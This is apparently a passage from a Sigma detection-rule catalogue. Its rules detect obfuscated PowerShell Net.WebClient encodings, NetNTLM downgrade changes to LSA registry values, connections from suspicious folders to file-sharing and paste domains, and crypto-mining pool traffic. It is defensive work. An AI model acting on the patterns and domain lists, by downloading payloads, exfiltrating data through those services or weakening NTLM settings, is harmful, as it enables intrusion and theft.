CommandLine:4AZQB0AC4AdwBFAEIA* OR CommandLine:uAGUAdAAuAHcARQBCA* OR CommandLine:TgBlAHQALgB3AEUAQg* OR CommandLine:OAGUAdAAuAHcARQBCA* OR CommandLine:bgBFAHQALgB3AEUAQg* OR CommandLine:4ARQB0AC4AdwBFAEIA* OR CommandLine:uAEUAdAAuAHcARQBCA* OR CommandLine:TgBFAHQALgB3AEUAQg* OR CommandLine:OAEUAdAAuAHcARQBCA* OR CommandLine:bgBlAFQALgB3AEUAQg* OR CommandLine:uAGUAVAAuAHcARQBCA* OR CommandLine:bgBFAFQALgB3AEUAQg* OR CommandLine:4ARQBUAC4AdwBFAEIA* OR CommandLine:uAEUAVAAuAHcARQBCA* OR CommandLine:TgBFAFQALgB3AEUAQg* OR CommandLine:OAEUAVAAuAHcARQBCA* OR CommandLine:TgBlAHQALgBXAEUAQg* OR CommandLine:4AZQB0AC4AVwBFAEIA* OR CommandLine:OAGUAdAAuAFcARQBCA* OR CommandLine:bgBFAHQALgBXAEUAQg* OR CommandLine:4ARQB0AC4AVwBFAEIA* OR CommandLine:uAEUAdAAuAFcARQBCA* OR CommandLine:TgBFAHQALgBXAEUAQg* OR CommandLine:OAEUAdAAuAFcARQBCA* OR CommandLine:bgBlAFQALgBXAEUAQg* OR CommandLine:4AZQBUAC4AVwBFAEIA* OR CommandLine:uAGUAVAAuAFcARQBCA* OR CommandLine:TgBlAFQALgBXAEUAQg* OR CommandLine:OAGUAVAAuAFcARQBCA* OR CommandLine:bgBFAFQALgBXAEUAQg* OR CommandLine:4ARQBUAC4AVwBFAEIA* OR CommandLine:uAEUAVAAuAFcARQBCA*)
view Sigma YAML
title: Net WebClient Casing Anomalies
id: c86133ad-4725-4bd0-8170-210788e0a7ba
status: test
description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques
references:
    - https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/
author: Florian Roth (Nextron Systems)
date: 2022-05-24
modified: 2023-01-05
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_encoded:
        CommandLine|contains:
            - 'TgBlAFQALgB3AEUAQg'
            - '4AZQBUAC4AdwBFAEIA'
            - 'OAGUAVAAuAHcARQBCA'
            - 'bgBFAHQALgB3AGUAYg'
            - '4ARQB0AC4AdwBlAGIA'
            - 'uAEUAdAAuAHcAZQBiA'
            - 'TgBFAHQALgB3AGUAYg'
            - 'OAEUAdAAuAHcAZQBiA'
            - 'bgBlAFQALgB3AGUAYg'
            - '4AZQBUAC4AdwBlAGIA'
            - 'uAGUAVAAuAHcAZQBiA'
            - 'TgBlAFQALgB3AGUAYg'
            - 'OAGUAVAAuAHcAZQBiA'
            - 'bgBFAFQALgB3AGUAYg'
            - '4ARQBUAC4AdwBlAGIA'
            - 'uAEUAVAAuAHcAZQBiA'
            - 'bgBlAHQALgBXAGUAYg'
            - '4AZQB0AC4AVwBlAGIA'
            - 'uAGUAdAAuAFcAZQBiA'
            - 'bgBFAHQALgBXAGUAYg'
            - '4ARQB0AC4AVwBlAGIA'
            - 'uAEUAdAAuAFcAZQBiA'
            - 'TgBFAHQALgBXAGUAYg'
            - 'OAEUAdAAuAFcAZQBiA'
            - 'bgBlAFQALgBXAGUAYg'
            - '4AZQBUAC4AVwBlAGIA'
            - 'uAGUAVAAuAFcAZQBiA'
            - 'TgBlAFQALgBXAGUAYg'
            - 'OAGUAVAAuAFcAZQBiA'
            - 'bgBFAFQALgBXAGUAYg'
            - '4ARQBUAC4AVwBlAGIA'
            - 'uAEUAVAAuAFcAZQBiA'
            - 'bgBlAHQALgB3AEUAYg'
            - '4AZQB0AC4AdwBFAGIA'
            - 'uAGUAdAAuAHcARQBiA'
            - 'TgBlAHQALgB3AEUAYg'
            - 'OAGUAdAAuAHcARQBiA'
            - 'bgBFAHQALgB3AEUAYg'
            - '4ARQB0AC4AdwBFAGIA'
            - 'uAEUAdAAuAHcARQBiA'
            - 'TgBFAHQALgB3AEUAYg'
            - 'OAEUAdAAuAHcARQBiA'
            - 'bgBlAFQALgB3AEUAYg'
            - '4AZQBUAC4AdwBFAGIA'
            - 'uAGUAVAAuAHcARQBiA'
            - 'TgBlAFQALgB3AEUAYg'
            - 'OAGUAVAAuAHcARQBiA'
            - 'bgBFAFQALgB3AEUAYg'
            - '4ARQBUAC4AdwBFAGIA'
            - 'uAEUAVAAuAHcARQBiA'
            - 'TgBFAFQALgB3AEUAYg'
            - 'OAEUAVAAuAHcARQBiA'
            - 'bgBlAHQALgBXAEUAYg'
            - '4AZQB0AC4AVwBFAGIA'
            - 'uAGUAdAAuAFcARQBiA'
            - 'TgBlAHQALgBXAEUAYg'
            - 'OAGUAdAAuAFcARQBiA'
            - 'bgBFAHQALgBXAEUAYg'
            - '4ARQB0AC4AVwBFAGIA'
            - 'uAEUAdAAuAFcARQBiA'
            - 'TgBFAHQALgBXAEUAYg'
            - 'OAEUAdAAuAFcARQBiA'
            - 'bgBlAFQALgBXAEUAYg'
            - '4AZQBUAC4AVwBFAGIA'
            - 'uAGUAVAAuAFcARQBiA'
            - 'TgBlAFQALgBXAEUAYg'
            - 'OAGUAVAAuAFcARQBiA'
            - 'bgBFAFQALgBXAEUAYg'
            - '4ARQBUAC4AVwBFAGIA'
            - 'uAEUAVAAuAFcARQBiA'
            - 'TgBFAFQALgBXAEUAYg'
            - 'OAEUAVAAuAFcARQBiA'
            - 'bgBlAHQALgB3AGUAQg'
            - '4AZQB0AC4AdwBlAEIA'
            - 'uAGUAdAAuAHcAZQBCA'
            - 'TgBlAHQALgB3AGUAQg'
            - 'OAGUAdAAuAHcAZQBCA'
            - 'bgBFAHQALgB3AGUAQg'
            - '4ARQB0AC4AdwBlAEIA'
            - 'uAEUAdAAuAHcAZQBCA'
            - 'TgBFAHQALgB3AGUAQg'
            - 'OAEUAdAAuAHcAZQBCA'
            - 'bgBlAFQALgB3AGUAQg'
            - '4AZQBUAC4AdwBlAEIA'
            - 'uAGUAVAAuAHcAZQBCA'
            - 'TgBlAFQALgB3AGUAQg'
            - 'OAGUAVAAuAHcAZQBCA'
            - 'bgBFAFQALgB3AGUAQg'
            - '4ARQBUAC4AdwBlAEIA'
            - 'uAEUAVAAuAHcAZQBCA'
            - 'TgBFAFQALgB3AGUAQg'
            - 'OAEUAVAAuAHcAZQBCA'
            - 'bgBlAHQALgBXAGUAQg'
            - '4AZQB0AC4AVwBlAEIA'
            - 'uAGUAdAAuAFcAZQBCA'
            - 'TgBlAHQALgBXAGUAQg'
            - 'OAGUAdAAuAFcAZQBCA'
            - 'bgBFAHQALgBXAGUAQg'
            - '4ARQB0AC4AVwBlAEIA'
            - 'uAEUAdAAuAFcAZQBCA'
            - 'TgBFAHQALgBXAGUAQg'
            - 'OAEUAdAAuAFcAZQBCA'
            - 'bgBlAFQALgBXAGUAQg'
            - '4AZQBUAC4AVwBlAEIA'
            - 'uAGUAVAAuAFcAZQBCA'
            - 'TgBlAFQALgBXAGUAQg'
            - 'OAGUAVAAuAFcAZQBCA'
            - 'bgBFAFQALgBXAGUAQg'
            - '4ARQBUAC4AVwBlAEIA'
            - 'uAEUAVAAuAFcAZQBCA'
            - 'TgBFAFQALgBXAGUAQg'
            - 'OAEUAVAAuAFcAZQBCA'
            - 'bgBlAHQALgB3AEUAQg'
            - '4AZQB0AC4AdwBFAEIA'
            - 'uAGUAdAAuAHcARQBCA'
            - 'TgBlAHQALgB3AEUAQg'
            - 'OAGUAdAAuAHcARQBCA'
            - 'bgBFAHQALgB3AEUAQg'
            - '4ARQB0AC4AdwBFAEIA'
            - 'uAEUAdAAuAHcARQBCA'
            - 'TgBFAHQALgB3AEUAQg'
            - 'OAEUAdAAuAHcARQBCA'
            - 'bgBlAFQALgB3AEUAQg'
            - 'uAGUAVAAuAHcARQBCA'
            - 'bgBFAFQALgB3AEUAQg'
            - '4ARQBUAC4AdwBFAEIA'
            - 'uAEUAVAAuAHcARQBCA'
            - 'TgBFAFQALgB3AEUAQg'
            - 'OAEUAVAAuAHcARQBCA'
            - 'TgBlAHQALgBXAEUAQg'
            - '4AZQB0AC4AVwBFAEIA'
            - 'OAGUAdAAuAFcARQBCA'
            - 'bgBFAHQALgBXAEUAQg'
            - '4ARQB0AC4AVwBFAEIA'
            - 'uAEUAdAAuAFcARQBCA'
            - 'TgBFAHQALgBXAEUAQg'
            - 'OAEUAdAAuAFcARQBCA'
            - 'bgBlAFQALgBXAEUAQg'
            - '4AZQBUAC4AVwBFAEIA'
            - 'uAGUAVAAuAFcARQBCA'
            - 'TgBlAFQALgBXAEUAQg'
            - 'OAGUAVAAuAFcARQBCA'
            - 'bgBFAFQALgBXAEUAQg'
            - '4ARQBUAC4AVwBFAEIA'
            - 'uAEUAVAAuAFcARQBCA'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Moderate Medium FP
NetNTLM Downgrade Attack
Detects NetNTLM downgrade attack
status test author Florian Roth (Nextron Systems), wagga ATT&CK technique id d3abac66-f11c-4ed0-8acb-50cc29c97eed
carbon_black query
EventID:4657 (ObjectName:\\REGISTRY\\MACHINE\\SYSTEM* ObjectName:ControlSet* ObjectName:\\Control\\Lsa*) (ObjectValueName:LmCompatibilityLevel OR ObjectValueName:NtlmMinClientSec OR ObjectValueName:RestrictSendingNTLMTraffic)
view Sigma YAML
title: NetNTLM Downgrade Attack
id: d3abac66-f11c-4ed0-8acb-50cc29c97eed
related:
    - id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2
      type: derived
status: test
description: Detects NetNTLM downgrade attack
references:
    - https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks
author: Florian Roth (Nextron Systems), wagga
date: 2018-03-20
modified: 2022-10-09
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1685
    - attack.t1112
logsource:
    product: windows
    service: security
    definition: 'Requirements: Audit Policy : Object Access > Audit Registry (Success)'
detection:
    selection:
        EventID: 4657
        ObjectName|contains|all:
            - '\REGISTRY\MACHINE\SYSTEM'
            - 'ControlSet'
            - '\Control\Lsa'
        ObjectValueName:
            - 'LmCompatibilityLevel'
            - 'NtlmMinClientSec'
            - 'RestrictSendingNTLMTraffic'
    condition: selection
falsepositives:
    - Unknown
level: high
Convert to SIEM query
high Strong Medium FP
NetNTLM Downgrade Attack - Registry
Detects NetNTLM downgrade attack
status test author Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT) ATT&CK technique id d67572a0-e2ec-45d6-b8db-c100d14b8ef2
carbon_black query
(TargetObject:SYSTEM\\* TargetObject:ControlSet* TargetObject:\\Control\\Lsa*) ((TargetObject:\\lmcompatibilitylevel (Details:DWORD\ \(0x00000000\) OR Details:DWORD\ \(0x00000001\) OR Details:DWORD\ \(0x00000002\))) OR (TargetObject:\\NtlmMinClientSec (Details:DWORD\ \(0x00000000\) OR Details:DWORD\ \(0x00000010\) OR Details:DWORD\ \(0x00000020\) OR Details:DWORD\ \(0x00000030\))) OR TargetObject:\\RestrictSendingNTLMTraffic)
view Sigma YAML
title: NetNTLM Downgrade Attack - Registry
id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2
status: test
description: Detects NetNTLM downgrade attack
references:
    - https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks
    - https://www.ultimatewindowssecurity.com/wiki/page.aspx?spid=NSrpcservers
author: Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT)
date: 2018-03-20
modified: 2024-12-03
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1685
    - attack.t1112
logsource:
    product: windows
    category: registry_event
detection:
    selection_regkey:
        TargetObject|contains|all:
            - 'SYSTEM\'
            - 'ControlSet'
            - '\Control\Lsa'
    selection_value_lmcompatibilitylevel:
        TargetObject|endswith: '\lmcompatibilitylevel'
        Details:
            - 'DWORD (0x00000000)'
            - 'DWORD (0x00000001)'
            - 'DWORD (0x00000002)'
    selection_value_ntlmminclientsec:
        TargetObject|endswith: '\NtlmMinClientSec'
        Details:
            - 'DWORD (0x00000000)' # No Security
            - 'DWORD (0x00000010)' # Only Integrity
            - 'DWORD (0x00000020)' # Only confidentiality
            - 'DWORD (0x00000030)' # Both Integrity and confidentiality
    selection_value_restrictsendingntlmtraffic:
        # Note: The obvious values with issues are 0x00000000 (allow all) and 0x00000001 (audit).
        # 0x00000002 can be secure but only if "ClientAllowedNTLMServers" is properly configured
        # Hence all values should be monitored and investigated
        TargetObject|endswith: '\RestrictSendingNTLMTraffic'
    condition: selection_regkey and 1 of selection_value_*
falsepositives:
    - Services or tools that set the values to more restrictive values
level: high
Convert to SIEM query
high Strong Medium FP
Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
status test author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
carbon_black query
(Image:\:\\$Recycle.bin* OR Image:\:\\Perflogs\\* OR Image:\:\\Temp\\* OR Image:\:\\Users\\Default\\* OR Image:\:\\Users\\Public\\* OR Image:\:\\Windows\\Fonts\\* OR Image:\:\\Windows\\IME\\* OR Image:\:\\Windows\\System32\\Tasks\\* OR Image:\:\\Windows\\Tasks\\* OR Image:\:\\Windows\\Temp\\* OR Image:\\AppData\\Temp\\* OR Image:\\config\\systemprofile\\* OR Image:\\Windows\\addins\\*) (Initiated:true (DestinationHostname:.githubusercontent.com OR DestinationHostname:anonfiles.com OR DestinationHostname:cdn.discordapp.com OR DestinationHostname:ddns.net OR DestinationHostname:dl.dropboxusercontent.com OR DestinationHostname:ghostbin.co OR DestinationHostname:github.com OR DestinationHostname:glitch.me OR DestinationHostname:gofile.io OR DestinationHostname:hastebin.com OR DestinationHostname:mediafire.com OR DestinationHostname:mega.co.nz OR DestinationHostname:mega.nz OR DestinationHostname:onrender.com OR DestinationHostname:pages.dev OR DestinationHostname:paste.ee OR DestinationHostname:pastebin.com OR DestinationHostname:pastebin.pl OR DestinationHostname:pastetext.net OR DestinationHostname:pixeldrain.com OR DestinationHostname:privatlab.com OR DestinationHostname:privatlab.net OR DestinationHostname:send.exploit.in OR DestinationHostname:sendspace.com OR DestinationHostname:storage.googleapis.com OR DestinationHostname:storjshare.io OR DestinationHostname:supabase.co OR DestinationHostname:temp.sh OR DestinationHostname:transfer.sh OR DestinationHostname:trycloudflare.com OR DestinationHostname:ufile.io OR DestinationHostname:w3spaces.com OR DestinationHostname:workers.dev))
view Sigma YAML
title: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
related:
    - id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153
      type: obsolete
status: test
description: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
references:
    - https://twitter.com/M_haggis/status/900741347035889665
    - https://twitter.com/M_haggis/status/1032799638213066752
    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
    - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2018-08-30
modified: 2025-12-10
tags:
    - attack.command-and-control
    - attack.t1105
logsource:
    category: network_connection
    product: windows
detection:
    selection_paths:
        Image|contains:
            - ':\$Recycle.bin'
            - ':\Perflogs\'
            - ':\Temp\'
            - ':\Users\Default\'
            - ':\Users\Public\'
            - ':\Windows\Fonts\'
            - ':\Windows\IME\'
            - ':\Windows\System32\Tasks\'
            - ':\Windows\Tasks\'
            - ':\Windows\Temp\'
            - '\AppData\Temp\'
            - '\config\systemprofile\'
            - '\Windows\addins\'
    selection_domains:
        Initiated: 'true'
        DestinationHostname|endswith:
            - '.githubusercontent.com'       # Includes both gists and github repositories / Michael Haag (idea)
            - 'anonfiles.com'
            - 'cdn.discordapp.com'
            - 'ddns.net'
            - 'dl.dropboxusercontent.com'
            - 'ghostbin.co'
            - 'github.com'
            - 'glitch.me'
            - 'gofile.io'
            - 'hastebin.com'
            - 'mediafire.com'
            - 'mega.co.nz'
            - 'mega.nz'
            - 'onrender.com'
            - 'pages.dev'
            - 'paste.ee'
            - 'pastebin.com'
            - 'pastebin.pl'
            - 'pastetext.net'
            - 'pixeldrain.com'
            - 'privatlab.com'
            - 'privatlab.net'
            - 'send.exploit.in'
            - 'sendspace.com'
            - 'storage.googleapis.com'
            - 'storjshare.io'
            - 'supabase.co'
            - 'temp.sh'
            - 'transfer.sh'
            - 'trycloudflare.com'
            - 'ufile.io'
            - 'w3spaces.com'
            - 'workers.dev'
    condition: all of selection_*
falsepositives:
    - Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule.
level: high
Convert to SIEM query
high Moderate Medium FP
Network Communication With Crypto Mining Pool
Detects initiated network connections to crypto mining pools
status stable author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) ATT&CK technique id fa5b1358-b040-4403-9868-15f7d9ab6329
carbon_black query
DestinationHostname:alimabi.cn OR DestinationHostname:ap.luckpool.net OR DestinationHostname:bcn.pool.minergate.com OR DestinationHostname:bcn.vip.pool.minergate.com OR DestinationHostname:bohemianpool.com OR DestinationHostname:ca\-aipg.miningocean.org OR DestinationHostname:ca\-dynex.miningocean.org OR DestinationHostname:ca\-neurai.miningocean.org OR DestinationHostname:ca\-qrl.miningocean.org OR DestinationHostname:ca\-upx.miningocean.org OR DestinationHostname:ca\-zephyr.miningocean.org OR DestinationHostname:ca.minexmr.com OR DestinationHostname:ca.monero.herominers.com OR DestinationHostname:cbd.monerpool.org OR DestinationHostname:cbdv2.monerpool.org OR DestinationHostname:cryptmonero.com OR DestinationHostname:crypto\-pool.fr OR DestinationHostname:crypto\-pool.info OR DestinationHostname:cryptonight\-hub.miningpoolhub.com OR DestinationHostname:d1pool.ddns.net OR DestinationHostname:d5pool.us OR DestinationHostname:daili01.monerpool.org OR DestinationHostname:de\-aipg.miningocean.org OR DestinationHostname:de\-dynex.miningocean.org OR DestinationHostname:de\-zephyr.miningocean.org OR DestinationHostname:de.minexmr.com OR DestinationHostname:dl.nbminer.com OR DestinationHostname:donate.graef.in OR DestinationHostname:donate.ssl.xmrig.com OR DestinationHostname:donate.v2.xmrig.com OR DestinationHostname:donate.xmrig.com OR DestinationHostname:donate2.graef.in OR DestinationHostname:drill.moneroworld.com OR DestinationHostname:dwarfpool.com OR DestinationHostname:emercoin.com OR DestinationHostname:emercoin.net OR DestinationHostname:emergate.net OR DestinationHostname:ethereumpool.co OR DestinationHostname:eu.luckpool.net OR DestinationHostname:eu.minerpool.pw OR DestinationHostname:fcn\-xmr.pool.minergate.com OR DestinationHostname:fee.xmrig.com OR DestinationHostname:fr\-aipg.miningocean.org OR DestinationHostname:fr\-dynex.miningocean.org OR DestinationHostname:fr\-neurai.miningocean.org OR DestinationHostname:fr\-qrl.miningocean.org OR DestinationHostname:fr\-upx.miningocean.org OR DestinationHostname:fr\-zephyr.miningocean.org OR DestinationHostname:fr.minexmr.com OR DestinationHostname:hellominer.com OR DestinationHostname:herominers.com OR DestinationHostname:hk\-aipg.miningocean.org OR DestinationHostname:hk\-dynex.miningocean.org OR DestinationHostname:hk\-neurai.miningocean.org OR DestinationHostname:hk\-qrl.miningocean.org OR DestinationHostname:hk\-upx.miningocean.org OR DestinationHostname:hk\-zephyr.miningocean.org OR DestinationHostname:huadong1\-aeon.ppxxmr.com OR DestinationHostname:iwanttoearn.money OR DestinationHostname:jw\-js1.ppxxmr.com OR DestinationHostname:koto\-pool.work OR DestinationHostname:lhr.nbminer.com OR DestinationHostname:lhr3.nbminer.com OR DestinationHostname:linux.monerpool.org OR DestinationHostname:lokiturtle.herominers.com OR DestinationHostname:luckpool.net OR DestinationHostname:masari.miner.rocks OR DestinationHostname:mine.c3pool.com OR DestinationHostname:mine.moneropool.com OR DestinationHostname:mine.ppxxmr.com OR DestinationHostname:mine.zpool.ca OR DestinationHostname:mine1.ppxxmr.com OR DestinationHostname:minemonero.gq OR DestinationHostname:miner.ppxxmr.com OR DestinationHostname:miner.rocks OR DestinationHostname:minercircle.com OR DestinationHostname:minergate.com OR DestinationHostname:minerpool.pw OR DestinationHostname:minerrocks.com OR DestinationHostname:miners.pro OR DestinationHostname:minerxmr.ru OR DestinationHostname:minexmr.cn OR DestinationHostname:minexmr.com OR DestinationHostname:mining\-help.ru OR DestinationHostname:miningpoolhub.com OR DestinationHostname:mixpools.org OR DestinationHostname:moner.monerpool.org OR DestinationHostname:moner1min.monerpool.org OR DestinationHostname:monero\-master.crypto\-pool.fr OR DestinationHostname:monero.crypto\-pool.fr OR DestinationHostname:monero.hashvault.pro OR DestinationHostname:monero.herominers.com OR DestinationHostname:monero.lindon\-pool.win OR DestinationHostname:monero.miners.pro OR DestinationHostname:monero.riefly.id OR DestinationHostname:monero.us.to OR DestinationHostname:monerocean.stream OR DestinationHostname:monerogb.com OR DestinationHostname:monerohash.com OR DestinationHostname:moneroocean.stream OR DestinationHostname:moneropool.com OR DestinationHostname:moneropool.nl OR DestinationHostname:monerorx.com OR DestinationHostname:monerpool.org OR DestinationHostname:moriaxmr.com OR DestinationHostname:mro.pool.minergate.com OR DestinationHostname:multipool.us OR DestinationHostname:myxmr.pw OR DestinationHostname:na.luckpool.net OR DestinationHostname:nanopool.org OR DestinationHostname:nbminer.com OR DestinationHostname:node3.luckpool.net OR DestinationHostname:noobxmr.com OR DestinationHostname:pangolinminer.comgandalph3000.com OR DestinationHostname:pool.4i7i.com OR DestinationHostname:pool.armornetwork.org OR DestinationHostname:pool.cortins.tk OR DestinationHostname:pool.gntl.co.uk OR DestinationHostname:pool.hashvault.pro OR DestinationHostname:pool.minergate.com OR DestinationHostname:pool.minexmr.com OR DestinationHostname:pool.monero.hashvault.pro OR DestinationHostname:pool.ppxxmr.com OR DestinationHostname:pool.somec.cc OR DestinationHostname:pool.support OR DestinationHostname:pool.supportxmr.com OR DestinationHostname:pool.usa\-138.com OR DestinationHostname:pool.xmr.pt OR DestinationHostname:pool.xmrfast.com OR DestinationHostname:pool2.armornetwork.org OR DestinationHostname:poolchange.ppxxmr.com OR DestinationHostname:pooldd.com OR DestinationHostname:poolmining.org OR DestinationHostname:poolto.be OR DestinationHostname:ppxvip1.ppxxmr.com OR DestinationHostname:ppxxmr.com OR DestinationHostname:prohash.net OR DestinationHostname:r.twotouchauthentication.online OR DestinationHostname:randomx.xmrig.com OR DestinationHostname:ratchetmining.com OR DestinationHostname:seed.emercoin.com OR DestinationHostname:seed.emercoin.net OR DestinationHostname:seed.emergate.net OR DestinationHostname:seed1.joulecoin.org OR DestinationHostname:seed2.joulecoin.org OR DestinationHostname:seed3.joulecoin.org OR DestinationHostname:seed4.joulecoin.org OR DestinationHostname:seed5.joulecoin.org OR DestinationHostname:seed6.joulecoin.org OR DestinationHostname:seed7.joulecoin.org OR DestinationHostname:seed8.joulecoin.org OR DestinationHostname:sg\-aipg.miningocean.org OR DestinationHostname:sg\-dynex.miningocean.org OR DestinationHostname:sg\-neurai.miningocean.org OR DestinationHostname:sg\-qrl.miningocean.org OR DestinationHostname:sg\-upx.miningocean.org OR DestinationHostname:sg\-zephyr.miningocean.org OR DestinationHostname:sg.minexmr.com OR DestinationHostname:sheepman.mine.bz OR DestinationHostname:siamining.com OR DestinationHostname:sumokoin.minerrocks.com OR DestinationHostname:supportxmr.com OR DestinationHostname:suprnova.cc OR DestinationHostname:teracycle.net OR DestinationHostname:trtl.cnpool.cc OR DestinationHostname:trtl.pool.mine2gether.com OR DestinationHostname:turtle.miner.rocks OR DestinationHostname:us\-aipg.miningocean.org OR DestinationHostname:us\-dynex.miningocean.org OR DestinationHostname:us\-neurai.miningocean.org OR DestinationHostname:us\-west.minexmr.com OR DestinationHostname:us\-zephyr.miningocean.org OR DestinationHostname:usxmrpool.com OR DestinationHostname:viaxmr.com OR DestinationHostname:webservicepag.webhop.net OR DestinationHostname:xiazai.monerpool.org OR DestinationHostname:xiazai1.monerpool.org OR DestinationHostname:xmc.pool.minergate.com OR DestinationHostname:xmo.pool.minergate.com OR DestinationHostname:xmr\-asia1.nanopool.org OR DestinationHostname:xmr\-au1.nanopool.org OR DestinationHostname:xmr\-eu1.nanopool.org OR DestinationHostname:xmr\-eu2.nanopool.org OR DestinationHostname:xmr\-jp1.nanopool.org OR DestinationHostname:xmr\-us\-east1.nanopool.org OR DestinationHostname:xmr\-us\-west1.nanopool.org OR DestinationHostname:xmr\-us.suprnova.cc OR DestinationHostname:xmr\-usa.dwarfpool.com OR DestinationHostname:xmr.2miners.com OR DestinationHostname:xmr.5b6b7b.ru OR DestinationHostname:xmr.alimabi.cn OR DestinationHostname:xmr.bohemianpool.com OR DestinationHostname:xmr.crypto\-pool.fr OR DestinationHostname:xmr.crypto\-pool.info OR DestinationHostname:xmr.f2pool.com OR DestinationHostname:xmr.hashcity.org OR DestinationHostname:xmr.hex7e4.ru OR DestinationHostname:xmr.ip28.net OR DestinationHostname:xmr.monerpool.org OR DestinationHostname:xmr.mypool.online OR DestinationHostname:xmr.nanopool.org OR DestinationHostname:xmr.pool.gntl.co.uk OR DestinationHostname:xmr.pool.minergate.com OR DestinationHostname:xmr.poolto.be OR DestinationHostname:xmr.ppxxmr.com OR DestinationHostname:xmr.prohash.net OR DestinationHostname:xmr.simka.pw OR DestinationHostname:xmr.somec.cc OR DestinationHostname:xmr.suprnova.cc OR DestinationHostname:xmr.usa\-138.com OR DestinationHostname:xmr.vip.pool.minergate.com OR DestinationHostname:xmr1min.monerpool.org OR DestinationHostname:xmrf.520fjh.org OR DestinationHostname:xmrf.fjhan.club OR DestinationHostname:xmrfast.com OR DestinationHostname:xmrigcc.graef.in OR DestinationHostname:xmrminer.cc OR DestinationHostname:xmrpool.de OR DestinationHostname:xmrpool.eu OR DestinationHostname:xmrpool.me OR DestinationHostname:xmrpool.net OR DestinationHostname:xmrpool.xyz OR DestinationHostname:xx11m.monerpool.org OR DestinationHostname:xx11mv2.monerpool.org OR DestinationHostname:xxx.hex7e4.ru OR DestinationHostname:zarabotaibitok.ru OR DestinationHostname:zer0day.ru
view Sigma YAML
title: Network Communication With Crypto Mining Pool
id: fa5b1358-b040-4403-9868-15f7d9ab6329
status: stable
description: Detects initiated network connections to crypto mining pools
references:
    - https://www.poolwatch.io/coin/monero
    - https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt
    - https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2021-10-26
modified: 2024-01-19
tags:
    - attack.impact
    - attack.t1496
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        DestinationHostname:
            - 'alimabi.cn'
            - 'ap.luckpool.net'
            - 'bcn.pool.minergate.com'
            - 'bcn.vip.pool.minergate.com'
            - 'bohemianpool.com'
            - 'ca-aipg.miningocean.org'
            - 'ca-dynex.miningocean.org'
            - 'ca-neurai.miningocean.org'
            - 'ca-qrl.miningocean.org'
            - 'ca-upx.miningocean.org'
            - 'ca-zephyr.miningocean.org'
            - 'ca.minexmr.com'
            - 'ca.monero.herominers.com'
            - 'cbd.monerpool.org'
            - 'cbdv2.monerpool.org'
            - 'cryptmonero.com'
            - 'crypto-pool.fr'
            - 'crypto-pool.info'
            - 'cryptonight-hub.miningpoolhub.com'
            - 'd1pool.ddns.net'
            - 'd5pool.us'
            - 'daili01.monerpool.org'
            - 'de-aipg.miningocean.org'
            - 'de-dynex.miningocean.org'
            - 'de-zephyr.miningocean.org'
            - 'de.minexmr.com'
            - 'dl.nbminer.com'
            - 'donate.graef.in'
            - 'donate.ssl.xmrig.com'
            - 'donate.v2.xmrig.com'
            - 'donate.xmrig.com'
            - 'donate2.graef.in'
            - 'drill.moneroworld.com'
            - 'dwarfpool.com'
            - 'emercoin.com'
            - 'emercoin.net'
            - 'emergate.net'
            - 'ethereumpool.co'
            - 'eu.luckpool.net'
            - 'eu.minerpool.pw'
            - 'fcn-xmr.pool.minergate.com'
            - 'fee.xmrig.com'
            - 'fr-aipg.miningocean.org'
            - 'fr-dynex.miningocean.org'
            - 'fr-neurai.miningocean.org'
            - 'fr-qrl.miningocean.org'
            - 'fr-upx.miningocean.org'
            - 'fr-zephyr.miningocean.org'
            - 'fr.minexmr.com'
            - 'hellominer.com'
            - 'herominers.com'
            - 'hk-aipg.miningocean.org'
            - 'hk-dynex.miningocean.org'
            - 'hk-neurai.miningocean.org'
            - 'hk-qrl.miningocean.org'
            - 'hk-upx.miningocean.org'
            - 'hk-zephyr.miningocean.org'
            - 'huadong1-aeon.ppxxmr.com'
            - 'iwanttoearn.money'
            - 'jw-js1.ppxxmr.com'
            - 'koto-pool.work'
            - 'lhr.nbminer.com'
            - 'lhr3.nbminer.com'
            - 'linux.monerpool.org'
            - 'lokiturtle.herominers.com'
            - 'luckpool.net'
            - 'masari.miner.rocks'
            - 'mine.c3pool.com'
            - 'mine.moneropool.com'
            - 'mine.ppxxmr.com'
            - 'mine.zpool.ca'
            - 'mine1.ppxxmr.com'
            - 'minemonero.gq'
